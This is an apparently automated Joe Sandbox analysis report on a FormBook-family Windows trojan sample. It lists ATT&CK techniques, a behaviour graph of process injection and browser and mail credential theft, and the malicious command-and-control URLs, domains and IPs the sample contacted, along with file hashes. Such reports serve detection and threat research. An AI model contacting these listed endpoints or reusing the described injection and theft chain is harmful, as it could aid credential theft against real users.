            Source: Yara matchFile source: 00000007.00000002.3382319545.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00AF8C4F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00AF923B
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            3
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            2
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets161
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569392 Sample: MGQeZjDXc3.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 28 www.ngmr.xyz 2->28 30 www.zz82x.top 2->30 32 7 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 MGQeZjDXc3.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 PXASisZrdVntP.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 PXASisZrdVntP.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.ngmr.xyz 54.67.87.110, 49958, 49966, 49976 AMAZON-02US United States 22->34 36 www.ophthalmo.cloud 217.160.0.207, 49923, 49929, 49936 ONEANDONE-ASBrauerstrasse48DE Germany 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            MGQeZjDXc3.exe66%ReversingLabsWin32.Trojan.AutoitInject
            MGQeZjDXc3.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.zz82x.top/fk06/?tX=7fn4Kf88PV&UL=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE3/2dDz+8oerua7w1yE5hDJxyFiuXydNgJB2c0DMp1k0BW4j2sII=100%Avira URL Cloudmalware
            http://www.ngmr.xyz/qj8y/?UL=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FqnxCzX9ML9xT9Z05e0CpTZrp7KXB+HgH/zGECw7Rot5BzIIB/yw=&tX=7fn4Kf88PV100%Avira URL Cloudmalware
            http://www.healthyloveforall.net/r22w/?tX=7fn4Kf88PV&UL=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqGipW/k2jsn/JKtfcj1kIMoHAw6q9wizkelVyrc4WhkWHt6hmqYs=0%Avira URL Cloudsafe
            http://www.ngmr.xyz/qj8y/100%Avira URL Cloudmalware
            http://www.ngmr.xyz100%Avira URL Cloudmalware
            http://www.ophthalmo.cloud/mgg3/0%Avira URL Cloudsafe
            http://www.zz82x.top/fk06/100%Avira URL Cloudmalware
            http://www.ophthalmo.cloud/mgg3/?UL=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY25FhT4OGOXAIr1rjNwK/1/eOG81EIQGExdwYvr17BwuFAzREpBF4=&tX=7fn4Kf88PV0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ophthalmo.cloud
            217.160.0.207
            truefalse
              unknown
              www.specialgift.asia.s.strikinglydns.com
              18.176.133.53
              truefalse
                unknown
                www.ngmr.xyz
                54.67.87.110
                truetrue
                  unknown
                  zz82x.top
                  38.47.232.196
                  truefalse
                    unknown
                    healthyloveforall.net
                    3.33.130.190
                    truefalse
                      unknown
                      www.healthyloveforall.net
                      unknown
                      unknowntrue
                        unknown
                        www.zz82x.top
                        unknown
                        unknowntrue
                          unknown
                          www.bonusgame2024.online
                          unknown
                          unknowntrue
                            unknown
                            www.specialgift.asia
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.healthyloveforall.net/r22w/?tX=7fn4Kf88PV&UL=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqGipW/k2jsn/JKtfcj1kIMoHAw6q9wizkelVyrc4WhkWHt6hmqYs=false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.ngmr.xyz/qj8y/?UL=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FqnxCzX9ML9xT9Z05e0CpTZrp7KXB+HgH/zGECw7Rot5BzIIB/yw=&tX=7fn4Kf88PVfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.ngmr.xyz/qj8y/false
                              • Avira URL Cloud: malware
                              unknown
                              http://www.zz82x.top/fk06/false
                              • Avira URL Cloud: malware
                              unknown
                              http://www.ophthalmo.cloud/mgg3/false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.zz82x.top/fk06/?tX=7fn4Kf88PV&UL=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE3/2dDz+8oerua7w1yE5hDJxyFiuXydNgJB2c0DMp1k0BW4j2sII=false
                              • Avira URL Cloud: malware
                              unknown
                              http://www.ophthalmo.cloud/mgg3/?UL=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY25FhT4OGOXAIr1rjNwK/1/eOG81EIQGExdwYvr17BwuFAzREpBF4=&tX=7fn4Kf88PVfalse
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabclip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.ngmr.xyzPXASisZrdVntP.exe, 00000007.00000002.3382319545.000000000526A000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000006.00000002.3383496738.0000000007EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              38.47.232.196
                                              zz82x.topUnited States
                                              174COGENT-174USfalse
                                              54.67.87.110
                                              www.ngmr.xyzUnited States
                                              16509AMAZON-02UStrue
                                              217.160.0.207
                                              www.ophthalmo.cloudGermany
                                              8560ONEANDONE-ASBrauerstrasse48DEfalse
                                              3.33.130.190
                                              healthyloveforall.netUnited States
                                              8987AMAZONEXPANSIONGBfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1569392
                                              Start date and time:2024-12-05 18:34:11 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 53s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:MGQeZjDXc3.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:2098959ee5c2ec3f2f8053cdd36fd789ab2c7575c65a78aed44d675859f4c5be.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@7/4
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 52
                                              • Number of non-executed functions: 295
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • VT rate limit hit for: MGQeZjDXc3.exe
                                              TimeTypeDescription
                                              12:36:21API Interceptor1072472x Sleep call for process: clip.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              38.47.232.196s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/fk06/
                                              jeez.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/fk06/
                                              3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/jxne/
                                              RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/jxne/
                                              w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/ak5l/
                                              enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/ak5l/
                                              Enquiry.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/ak5l/
                                              Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/2lu6/
                                              x.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/ym8o/
                                              bin.exeGet hashmaliciousFormBookBrowse
                                              • www.zz82x.top/ym8o/
                                              54.67.87.110s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                              • www.ngmr.xyz/qj8y/
                                              rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                              • www.ngmr.xyz/ntib/
                                              jeez.exeGet hashmaliciousFormBookBrowse
                                              • www.ngmr.xyz/qj8y/
                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.ngmr.xyz/txr6/
                                              UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.ngmr.xyz/txr6/
                                              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                              • www.teenageoverload.xyz/tk11/
                                              DN.exeGet hashmaliciousFormBookBrowse
                                              • www.teenageoverload.xyz/tk11/
                                              Debit note Jan-Jul 2024.exeGet hashmaliciousFormBookBrowse
                                              • www.teenageoverload.xyz/tk11/
                                              ZRaWv2lX6l.exeGet hashmaliciousFormBookBrowse
                                              • www.3937981.xyz/enuj/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.specialgift.asia.s.strikinglydns.comwavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                              • 35.156.117.131
                                              Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 35.156.117.131
                                              jeez.exeGet hashmaliciousFormBookBrowse
                                              • 35.156.117.131
                                              www.ophthalmo.clouds7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.207
                                              jeez.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.207
                                              sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.207
                                              www.ngmr.xyzs7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                              • 54.67.87.110
                                              Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 54.67.87.110
                                              rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                              • 54.67.87.110
                                              jeez.exeGet hashmaliciousFormBookBrowse
                                              • 54.67.87.110
                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                              • 54.67.87.110
                                              z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 54.67.87.110
                                              UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 54.67.87.110
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AMAZON-02UShttps://ness.wiktripfitness.com/ghjki9l-8765t4/3/er4t5y6u7jyhtgrfefrgthyjuyhtgdsarfedwsqaGet hashmaliciousUnknownBrowse
                                              • 13.228.52.238
                                              s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                              • 54.67.87.110
                                              arm6.elfGet hashmaliciousUnknownBrowse
                                              • 54.171.230.55
                                              fmlgbgc2p5.exeGet hashmaliciousNeconydBrowse
                                              • 52.34.198.229
                                              spc.elfGet hashmaliciousUnknownBrowse
                                              • 54.171.230.55
                                              cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                                              • 52.34.198.229
                                              https://ln5.sync.com/dl/3c61e3b30#gum48d7j-5vgyh9gy-tcjv9rp4-ffxvqp5fGet hashmaliciousUnknownBrowse
                                              • 15.222.106.233
                                              https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                                              • 108.158.75.11
                                              http://kitces.emlnk1.comGet hashmaliciousUnknownBrowse
                                              • 13.227.9.168
                                              https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                              • 13.250.84.149
                                              COGENT-174USlgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                              • 206.238.89.119
                                              s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                              • 38.47.232.196
                                              f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                              • 38.224.37.24
                                              https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                              • 38.91.45.7
                                              VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                              • 114.114.114.114
                                              New quotation request.exeGet hashmaliciousFormBookBrowse
                                              • 38.47.232.202
                                              SRT68.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.184.207
                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 149.51.18.106
                                              reduce.exeGet hashmaliciousGO BackdoorBrowse
                                              • 38.180.205.164
                                              powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 149.6.31.140
                                              ONEANDONE-ASBrauerstrasse48DEs7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.207
                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 74.208.53.196
                                              FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                              • 217.160.114.212
                                              FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                              • 217.160.114.212
                                              togiveme.docGet hashmaliciousRemcosBrowse
                                              • 217.160.114.212
                                              nicetomeetyougreatthignsgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                              • 217.160.114.212
                                              cUxXrdUvYR.rtfGet hashmaliciousRemcosBrowse
                                              • 217.160.114.212
                                              Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                              • 217.160.114.212
                                              teste.ppc.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                              • 82.223.130.227
                                              UVIxNxvzCl.rtfGet hashmaliciousUnknownBrowse
                                              • 217.160.114.212
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\clip.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.1239949490932863
                                              Encrypted:false
                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                              MD5:271D5F995996735B01672CF227C81C17
                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\MGQeZjDXc3.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):287232
                                              Entropy (8bit):7.995134738427892
                                              Encrypted:true
                                              SSDEEP:6144:afLXfnNF28cuegytj84qNGpF7sYNDlMKJhFqPIALt:4Xvy8c7gy+tkZ3HwnB
                                              MD5:B6C1C909F001E50840E0F01A5F82EDC8
                                              SHA1:D5AA5157BAC7AD9BB9C4BD0C88A78A2B6236D983
                                              SHA-256:4B1A0F1625E64A3E0B5B7A6205899523411C6F4FE37B2B63D0E7DE8C12A26570
                                              SHA-512:27E92B860D9CF0973DE2D36E6990482E7D1B92EAF7F4CC5C7247980B20F669C02FA8464137FDF936E7E2B1597ADC3B1BD2611B08855A1DD74F9AB943D07B6C25
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....GNXO`.]....i.D:..g[I...XO8AIT0MCMU4D9CRVOXAQGNXO8AIT0.CMU:[.MR.F.`.F..nl) '.=1"2F%Tc17!6.%g,=oJ4'tY#c..gdT,63aUL[cNXO8AITILJ.hT#.~21.e!6.T...{)3.W...$^.H..}1 ..&[)t4W.CMU4D9CR..XA.FOX..P.T0MCMU4D.CPWDYJQG.\O8AIT0MCM. D9CBVOX!UGNX.8AYT0MAMU2D9CRVOXGQGNXO8AI44MCOU4D9CRTO..QG^XO(AIT0]CME4D9CRV_XAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU.0\;&VOX..CNX_8AI.4MC]U4D9CRVOXAQGNXo8A)T0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8A
                                              Process:C:\Users\user\Desktop\MGQeZjDXc3.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):287232
                                              Entropy (8bit):7.995134738427892
                                              Encrypted:true
                                              SSDEEP:6144:afLXfnNF28cuegytj84qNGpF7sYNDlMKJhFqPIALt:4Xvy8c7gy+tkZ3HwnB
                                              MD5:B6C1C909F001E50840E0F01A5F82EDC8
                                              SHA1:D5AA5157BAC7AD9BB9C4BD0C88A78A2B6236D983
                                              SHA-256:4B1A0F1625E64A3E0B5B7A6205899523411C6F4FE37B2B63D0E7DE8C12A26570
                                              SHA-512:27E92B860D9CF0973DE2D36E6990482E7D1B92EAF7F4CC5C7247980B20F669C02FA8464137FDF936E7E2B1597ADC3B1BD2611B08855A1DD74F9AB943D07B6C25
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....GNXO`.]....i.D:..g[I...XO8AIT0MCMU4D9CRVOXAQGNXO8AIT0.CMU:[.MR.F.`.F..nl) '.=1"2F%Tc17!6.%g,=oJ4'tY#c..gdT,63aUL[cNXO8AITILJ.hT#.~21.e!6.T...{)3.W...$^.H..}1 ..&[)t4W.CMU4D9CR..XA.FOX..P.T0MCMU4D.CPWDYJQG.\O8AIT0MCM. D9CBVOX!UGNX.8AYT0MAMU2D9CRVOXGQGNXO8AI44MCOU4D9CRTO..QG^XO(AIT0]CME4D9CRV_XAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU.0\;&VOX..CNX_8AI.4MC]U4D9CRVOXAQGNXo8A)T0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8AIT0MCMU4D9CRVOXAQGNXO8A
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.149989814298183
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:MGQeZjDXc3.exe
                                              File size:1'217'024 bytes
                                              MD5:7b5010e993f3043fbc100be1c7984f85
                                              SHA1:2af396c73fe4274816b0769c0cfb8b7638879a2d
                                              SHA256:2098959ee5c2ec3f2f8053cdd36fd789ab2c7575c65a78aed44d675859f4c5be
                                              SHA512:ee78af17675827907f21ec9a24a1952bdba99e86c39979e4a0b0055639def14763dc66001b1850409b806831bd9aedf7212e8d6c1d0777fd2f121d923ee30626
                                              SSDEEP:24576:ktb20pkaCqT5TBWgNQ7asGNNeWsTRsbesj5e6A:NVg5tQ7asGNQ7R+fA5
                                              TLSH:C945CF1373DD8361C3726273BA15B701BEBB782506B5F96B2FD8093DE920122525EA73
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                              Icon Hash:aaf3e3e3938382a0
                                              Entrypoint:0x425f74
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
